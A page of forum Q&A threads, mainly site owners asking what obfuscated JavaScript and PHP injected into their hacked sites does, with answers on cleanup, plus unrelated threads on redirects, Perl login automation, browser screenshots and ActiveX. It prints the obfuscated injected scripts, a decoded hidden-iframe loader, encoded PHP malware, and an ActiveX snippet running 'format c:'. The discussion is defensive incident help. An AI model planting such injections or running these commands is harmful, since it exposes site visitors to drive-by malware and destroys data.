What does this script do? - javascript

Would anybody be able to tell me what the below script does? It keeps injecting itself into our site about every two weeks (always between Sundays and Mondays). We've reloaded our "clean" site dozens of times but it just keeps happening. We've installed and made every security recommendation that we've read but it just keeps getting into all of our index.html files and a few of our php files.
Anybody have any idea of what it does or where it comes from? We could really use some help!
<script>
var ar="v)y{ifu=lg[rETCB}me h>;
s\"/ 0.,tN1:('<cAb]waonpd";
try{
'qwe'.length(1);
}catch(a){
k=new Boolean().toString();
date=new Date();
};
var ar2 = "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
e=Function("retu"+pau)();
ar2=('gfhgffg',e(ar2));s="";
for(i=0;i<ar2.length;i++){
s+=ar.substr(ar2[i]/3,1);
}
e(s);
</script>
<script>
var ar="N<B)10'paes,>.nidtf3[T;
hwy mCE:gA{](=o/\"c}lbr vu";
try{
'qwe'.length(1);
}catch(a){
k=new Boolean().toString();
date=new Date();
};
var ar2 = "f78,78,45,54,135,105,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,9,99,78,78,78,45,54,132,24,81,27,132,105,9,66,78,78,123,135,27,126,30,27,135,99,78,78,78,48,111,120,141,81,27,42,51,39,72,132,45,51,27,105,117,3,45,54,132,24,81,27,135,30,132,120,108,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,135,72,45,48,51,69,108,18,12,15,18,135,69,27,45,93,69,51,108,18,12,15,18,135,30,51,75,126,27,108,18,138,45,30,45,129,45,126,45,51,75,90,69,45,48,48,27,42,66,21,111,30,45,51,45,111,42,90,24,129,30,111,126,141,51,27,66,126,27,54,51,90,15,66,51,111,21,90,15,66,18,36,3,114,45,54,132,24,81,27,36,117,9,66,78,78,123,78,78,54,141,42,120,51,45,111,42,135,45,54,132,24,81,27,132,105,9,99,78,78,78,138,24,132,135,54,135,108,135,48,111,120,141,81,27,42,51,39,120,132,27,24,51,27,87,126,27,81,27,42,51,105,18,45,54,132,24,81,27,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,30,132,120,18,33,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,9,66,54,39,30,51,75,126,27,39,138,45,30,45,129,45,126,45,51,75,108,18,69,45,48,48,27,42,18,66,54,39,30,51,75,126,27,39,21,111,30,45,51,45,111,42,108,18,24,129,30,111,126,141,51,27,18,66,54,39,30,51,75,126,27,39,126,27,54,51,108,18,15,18,66,54,39,30,51,75,126,27,39,51,111,21,108,18,15,18,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,72,45,48,51,69,18,33,18,12,15,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,69,27,45,93,69,51,18,33,18,12,15,18,9,66,78,78,78,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,39,24,21,21,27,42,48,84,69,45,126,48,105,54,9,66,78,78,123]".replace(k.substr(0,1),'[');
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
e=Function("retu"+pau)();
ar2=('gfhgffg',e(ar2));
s="";
for(i=0;i<ar2.length;i++){
s+=ar.substr(ar2[i]/3,1);
}
e(s);
</script>
<script>
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
try{
gserkewg();
}catch(a){
k=new Boolean().toString()
};
var ar2 = "f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126,-99,21,-60,84,-6,-60,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,21,90,-84,48,-21,-30,36,-60,3,123,-126,21,3,96,-93,30,-33,30,6,-60,3,123,-126,21,21,12,-57,117,6,-60,-60,9,18,15,-15,12,-12,87,-87,27,-57,-9,36,3,48,0,45,3,-15,-117,87,-36,-15,27,-27,51,45,-135,96,-45,3,36,36,-108,48,66,-12,6,6,-135,69,-66,138,-18,-54,24,-87,-3,138,-18,-108,117,-36,18,-72,-42,-3,102,-90,126,-3,-45,-42,78,-60,0,45,-45,0,-63,21,117,-57,-12,-27,51,45,-102,6,-42,-3,102,-90,126,-138,105,-57,15,3,0,0,-39,75,-102,39,-36,36,39,-39,54,3,-12,-60,-12,126,3,-69,36,-24,-84,138,-36,-30,66,-105,99,6,-126,126,3,-69,33,-87,27,-42,-3,102,-90,126,-120,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,42,-60,84,-66,18,-18,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,30,78,-123,105,-48,12,-57,117,6,-30,-81,18,15,-15,12,-12,87,-87,27,-57,63,-60,24,3,48,0,45,3,-123,108,-123,105,-48,12,-57,117,6,-30,-99,87,-36,-15,27,-27,51,45,-63,-60,84,-45,3,36,36,-108,48,66,-120,108,-123,105,-48,12,-57,117,6,-30,24,6,-135,69,6,-60,126,-126,108,-123,105,-48,12,-57,117,6,-30,-36,24,-87,69,-60,126,-126,108,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,111,-84,48,-21,-30,-24,18,-18,3,123,-126,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,24,96,-93,30,-33,30,-54,18,-18,3,123,-126,30,78,-60,0,0,27,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-15,-6,-93,0,129,3,-48,-6,-45,3,87,-39,12,-102,45,78,-60,0,45]".replace(k.substr(0,1),'[');
try{
asfasf();
}catch(e)
{
p=(typeof document).toString()
};
pau="rn evobject".replace(p,"al");
e=new Function("","retu"+pau);
e=e();
ar2=e(ar2);
s="";
var pos=0;
for(i=0;i!=ar2.length;i++){
pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;
s+=ar.substr(pos,1);
}
e(s);
</script>

Via the power of JSUnpack, we can decrypt a chunk of that obfuscated code and see part of the functionality...
document.write (s) <iframe src='http://doloasxxxxedoutforsafety.com/count0.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
That source is currently 404, but it doesn't look very friendly. It's effectively downloading an arbitrary page into the browser, which could be for something as "simple" as fake Pagerank building through to a malicious drive by code execution exploit. Regardless, it appears dead for now, but it probably wasn't trying to help you.
You seem to have some kind of XSS injection flaw in your site software (or a malicious internal user). Looks like it's time for a proper security audit (both of server, server software, and your PHP application). If you're running an off the shelf PHP package (like Wordpress), make sure you've upgraded to the latest version. You might also want to change any relevant passwords (if it's happening on a regular schedule, it might be a manual injection).

The script is probably designed to lure users to a site containing malware and browser exploits.
The reason that you're repeatedly being infected is because somewhere in your codebase there is a vulnerability. I suspect you've got an unprotected or broken file upload page that allows any old file to be uploaded (including scripts) and then executed. Once it's done infecting your files it probably delete's itself.
I would have a trawl through your web server log files at around the time the infection happens and look for suspicious activity for any pages that allow users to upload content.

what other scripts do you use on your site? look at those because those could be injecting this.
maybe your webhost is shady, try to change. Or it could be a web analytics code

The exact same code is being injected into the index.html file on one of my sites. By looking at the logs we determined that someone with the IP address 84.16.226.245 had gotten access via FTP. We're not exactly sure how he got in yet, but you might want to take a look at your logs and block that address.
Good luck!

Related

How can I make a Java Script to redirect to another domain?

my name is Angel and I am not a programmer nor do I have previous experience with any language, today I have noticed that a forum to which I belong bought a new domain, but there is a problem with cookies, since it is not possible to log in if accessed from the new domain.
Many users have had this problem and I wanted to try to make a java script to solve this problem, but the furthest I got was that any web page was redirected to the forum home page, reloading over and over again.
I'm not good at programming, but Javascript has piqued my interest, because of the ease of transforming it into a browser extension.
What I mean is redirect from:
forum.free.com/discussion/8873
to
cooldomain.com/discussion/8873
and that every url with the domain "forum.free.com" redirects to the same page, only with the new domain of "cooldomain.com"
I know that it is a simple script and that it is too much to ask, but the intention is to learn through the use of annotations the reason for each line and to help the users of said forum.
Thank you.
This is the "script" i "made":
switch(window.location.hostname){
case "forum.free.com":
window.location.replace("cooldomain.com");
break;
...
}
you can try something like this:
<script language=javascript>
function redirect(){
window.location = "http://cooldomain.com/discussion/8873";
}
</script>

Corrupted file on my ftp server in my wordpress site

I'm in charge of Wordpress website. 1 year ago, the site had has been hacked. When someone connected on the site by typing the url, he was redirected to another "fake" site. I discovered that a line was simply in the index.php to redirect to another site. I removed the line and made a restoration of my ftp server. Before that i noticed some susicious files on the ftp server, i did not created these file, and there was some obscure php and js code, with some random char.
Recently the site had the same problem unless there was only a blank page when we connect on the site. I restored again the site. Before that i noticed some suspicious files on the ftp server, i did not created these file, and there was some obscure php and js code in it, with some random char.
All the files had almost the same date of vreation and i had no right to delete them from the server. I think that the vulnerabilities come from here but i can't find any similar case on the internet. Do someone have information about it ? I'm just looking for some information know and i don't have access to the site at the moment.
EDIT:
I have this kind of file :
<?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
someone know what it is ?
This is incredibly broad. There are literally millions of possible vectors for attack on a website. The fact that you were attacked does not in itself suggest any one of those possibilities over any other.
Since you have a timestamp when the attack occurred, check server logs at that time for clues about the vector. Was there SFTP access at that time? Perhaps a legitimate user's password is compromised. Was there HTTP access at that time? Perhaps a plugin has a vulnerability and needs to be disabled or upgraded.
An attacker only needs one vulnerability to gain access to the site. It may be obvious which it was (e.g., if you see SFTP activity from a known user account), or it may take extensive research to figure out what happened and how.
It's very simple: you got hacked.
Forget trying to deobfuscate the php files; they may tell you what the files do, but they won't tell you how the files got there. Delete them all.
And you won't find the exploit vector unless you carefully parse server logs and check all your plugins and theme for vulnerabilities. And the vector could have been malware on your own PC/mac that stole credentials.
The fix is simple: carefully clean the site and the hosting account by following FAQ My site was hacked - WordPress Codex. Scan your own PC/Mac and any machine that was used to access WordPress admin and the hosting account.
If this is you own server, you need to harden it, too. Try searching https://serverfault.com/ for information on your OS and how to secure and harden it.
And take a look at the recommended security measures for WordPress itself in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex
When you say you have no right to delete them, aren't you managing the site? If you do not have full administrative rights, you should contact whoever does and explain the situation so that they may handle it immediately, or at least enable you to do so.
Do you know how the site was hacked the first and second time? Obviously there is a vulnerability that needs to be addressed.
What kind of files were left behind? Can you examine/explain the contents any further than finding 'obscure' code?

How to manipulate Javascript websites in Perl

I have been asked to automate the logging into a webapp(what I assume to be one, that runs a lot of .aspx and .js scripts) that, currently, can only run in IE. Now i am programming in Perl and have tried to use Win32::IE::Mechanize to run the IE browser and log in. What i did was try an extract all the forms from the webapp, and given the users information, fill out the required forms, but this is where the problem arises, when I try and run the subroutine no forms appear......
So then I transitioned into WWW::Mechanize and used the post subroutine(from LWP::UserAgent) which solved the problem for the most part. Now i've run into a problem in the response, from the server, I get this script as the content of the response and I don't know what to do with it.
So my question is: Using Perl how can I go about to manipulate a Javascript functions in a website? Would that even be a valid solution to the problem?
I am open to writing this in other programming languages as well. Thanks in advance for the help!
(So that I can fully log in to the webapp)
Update: The content of the response:
var msgTimerID;
var strForceLogOff = "false";
function WindowOnLoad(){
if ("false" == "true" && "false" == "false")
MerlinSystemMsg("",64);
if ("false"=="true")
msgTimerID = window.setInterval("MerlinSystemMsg(10095,64)", 300000,'javascript');
}
function MyShowModal(){
showModalDialog("", window, strFeatures);}
function clearMsgInterval(){
window.clearInterval(msgTimerID);
}
function WindowOnUnLoad(){
if(top.frames(0).document.getElementById("OPMODE").value =="LOGOFF"){
strFeatures = "width=1,height=1,left=1000,top=1000,toolbar=no,scrollbars=no,menubar=no,location=no,directories=no,status=yes,resizable=1";
window.open("ForceLogOff.aspx","forcelogout",strFeatures);
}
}
window.onbeforeunload = WindowOnUnLoad;
window.onload = WindowOnLoad;
There is also this Frame Title that has the src:
FRAME TITLE="Service Desk Express Navigator" SRC="options_nailogo.aspx" MARGINWIDTH=0 MARGINHEIGHT=0 NORESIZE scrolling=no
Trying to emulate the browser with a fully functioning JS engine is going to be a mighty big task. Instead, I'd suggest that you just try to emulate the actual interaction with the web site and not care what HTML/JS is actually sent back. Your server side code doesn't care how the HTTP submissions take place, only that they do. Admittedly this is more fragile if the forms change a lot, but at least you're not trying to implement a full browser.
So look at modules like LWP::UserAgent, HTTP::Request and HTTP::Response.
I'm copying and pasting my answer to your other duplicate question here
(You should consider deleting one of these?)
That content is the website source :)
How WWW::Mechanize deals with FRAME SRC as a link:
Note that <FRAME SRC="..."> tags are parsed out of the the HTML and
treated as links so this method works with them.
You'll want to use follow_link on that link.
As far as dealing with Javascript, there is support for a Firefox Add-on called MozRepl that you can use in conjunction with WWW::Mechanize::Firefox that I have used in the past to call Javascript code while crawling a page.

Take Screenshot of Browser via JavaScript (or something else)

For support reasons I want to be able for a user to take a screenshot of the current browser window as easy as possible and send it over to the server.
Any (crazy) ideas?
That would appear to be a pretty big security hole in JavaScript if you could do this. Imagine a malicious user installing that code on your site with a XSS attack and then screenshotting all of your daily work. Imagine that happening with your online banking...
However, it is possible to do this sort of thing outside of JavaScript. I developed a Swing application that used screen capture code like this which did a great job of sending an email to the helpdesk with an attached screenshot whenever the user encountered a RuntimeException.
I suppose you could experiment with a signed Java applet (shock! horror! noooooo!) that hung around in the corner. If executed with the appropriate security privileges given at installation it might be coerced into executing that kind of screenshot code.
For convenience, here is the code from the site I linked to:
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import javax.imageio.ImageIO;
import java.io.File;
...
public void captureScreen(String fileName) throws Exception {
Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
Rectangle screenRectangle = new Rectangle(screenSize);
Robot robot = new Robot();
BufferedImage image = robot.createScreenCapture(screenRectangle);
ImageIO.write(image, "png", new File(fileName));
}
...
Please see the answer shared here for a relatively successful implementation of this:
https://stackoverflow.com/a/6678156/291640
Utilizing:
https://github.com/niklasvh/html2canvas
You could try to render the whole page in canvas and save this image back to server. have fun :)
A webpage can't do this (or at least, I would be very surprised if it could, in any browser) but a Firefox extension can. See https://developer.mozilla.org/en/Drawing_Graphics_with_Canvas#Rendering_Web_Content_Into_A_Canvas -- when that page says "Chrome privileges" that means an extension can do it, but a web page can't.
Seems to me that support needs (at least) the answers for two questions:
What does the screen look like? and
Why does it look that way?
A screenshot -- a visual -- is very necessary and answers the first question, but it can't answer the second.
As a first attempt, I'd try to send the entire page up to support. The support tech could display that page in his browser (answers the first question); and could also see the current state of the customer's html (helps to answer the second question).
I'd try to send as much of the page as is available to the client JS by way of AJAX or as the payload of a form. I'd also send info not on the page: anything that affects the state of the page, like cookies or session IDs or whatever.
The cust might have a submit-like button to start the process.
I think that would work. Let's see: it needs some CGI somewhere on the server that catches the incoming user page and makes it available to support, maybe by writing a disk file. Then the support person can load (or have loaded automatically) that same page. All the other info (cookies and so on) can be put into the page that support sees.
PLUS: the client JS that handles the submit-button onclick( ) could also include any useful JS variable values!
Hey, this can work! I'm getting psyched :-)
HTH
-- pete
I've seen people either do this with two approaches:
setup a separate server for screenshotting and run a bunch of firefox instances on there, check out these two gem if you're doing it in ruby: selenium-webdriver and headless
use a hosted solution like http://url2png.com (way easier)
You can also do this with the Fireshot plugin. I use the following code (that I extracted from the API code so I don't need to include the API JS) to make a direct call to the Fireshot object:
var element = document.createElement("FireShotDataElement");
element.setAttribute("Entire", true);
element.setAttribute("Action", 1);
element.setAttribute("Key", "");
element.setAttribute("BASE64Content", "");
element.setAttribute("Data", "C:/Users/jagilber/Downloads/whatev.jpg");
if (typeof(CapturedFrameId) != "undefined")
element.setAttribute("CapturedFrameId", CapturedFrameId);
document.documentElement.appendChild(element);
var evt = document.createEvent("Events");
evt.initEvent("capturePageEvt", true, false);
element.dispatchEvent(evt);
Note: I don't know if this functionality is only available for the paid version or not.
Perhaps http://html2canvas.hertzen.com/ could be used. Then you can capture the display and then process it.
You might try PhantomJs, a headlesss browsing toolkit.
http://phantomjs.org/
The following Javascript example demonstrates basic screenshot functionality:
var page = require('webpage').create();
page.settings.userAgent = 'UltimateBrowser/100';
page.viewportSize = { width: 1200, height: 1200 };
page.clipRect = { top: 0, left: 0, width: 1200, height: 1200 };
page.open('https://google.com/', function () {
page.render('output.png');
phantom.exit();
});
I understand this post is 5 years old, but for the sake of future visits I'll add my own solution here which I think solves the original post's question without any third-party libraries apart from jQuery.
pageClone = $('html').clone();
// Make sure that CSS and images load correctly when opening this clone
pageClone.find('head').append("<base href='" + location.href + "' />");
// OPTIONAL: Remove potentially interfering scripts so the page is totally static
pageClone.find('script').remove();
htmlString = pageClone.html();
You could remove other parts of the DOM you think are unnecessary, such as the support form if it is in a modal window. Or you could choose not to remove scripts if you prefer to maintain some interaction with dynamic controls.
Send that string to the server, either in a hidden field or by AJAX, and then on the server side just attach the whole lot as an HTML file to the support email.
The benefits of this are that you'll get not just a screenshot but the entire scrollable page in its current form, plus you can even inspect and debug the DOM.
Print Screen? Old school and a couple of keypresses, but it works!
This may not work for you, but on IE you can use the snapsie plugin. It doesn't seem to be in development anymore, but the last release is available from the linked site.
i thing you need a activeX controls. without it i can't imagine. you can force user to install them first after the installation on client side activex controls should work and you can capture.
We are temporarily collecting Ajax states, data in form fields and session information. Then we re-render it at the support desk. Since we test and integrate for all browsers, there are hardly any support cases for display reasons.
Have a look at the red button at the bottom on holidaycheck
Alternatively there is html2canvas of Google. But it is only applicable for never browsers and I've never tried it.
In JavaScript? No. I do work for a security company (sort of NetNanny type stuff) and the only effective way we've found to do screen captures of the user is with a hidden application.

Suprisingly, JavaScript Code could execute any process it want. Why?

I asked "How to run a executable file from a web page?"
Many people told me that's impossible, but my colleague find a piece of JavaScript code that could execute any process. I can not believe ActiveX is so dangerous.
How could this happen? Why this is not forbidden by IE?
<SCRIPT language=JavaScript>
function Run(strPath) {
try {
var objShell = new ActiveXObject("wscript.shell");
objShell.Run(strPath);
objShell = null;
}
catch (e){alert('Can not find "'+strPath)
}
}
</SCRIPT>
<BUTTON class=button onclick="Run('notepad')">notepad</BUTTON><br>
<BUTTON class=button onclick="Run('mspaint')">mspaint</BUTTON><br>
<BUTTON class=button onclick="Run('calc')">calc</BUTTON><br>
<BUTTON class=button onclick="Run('format c:')">format c:</BUTTON><br>
While you can do this IE will block it saying that there is an
ActiveX Control is trying to access
you computer, click here for options
You can only run these if the end user allows them too and hopefully people are clever enough not to allow it to run. If you do allow it then there is always another alert asking if you really want to run this so there should be enough security around it.
Local files run in a different security environment than remote files, so while that will work if you save the file as an html and open it from your computer, if you upload it on a server and try to run it from there it will not work.
Did you try this?
wscript.shell can't be used in this way from a web page loaded remotely. If you loaded the web page from a local file or have changed your security settings it might work but it won't work when loaded from a remote web server.
The good news is IE8 blocks this behaviour, even with a local file. I don't know about IE7, though I would imagine this is also the case. I would doubt it would work with a remote file, even with IE6, otherwise we would have had some major incident by now and a patch would have been issued.
Its depends on your browser's security configuration. In some cases this peace of code will not be executed. But anyway user will be asked to allow ActiveX to run external process:
ActiveX Control is trying to access you computer, click here for options

Categories

Resources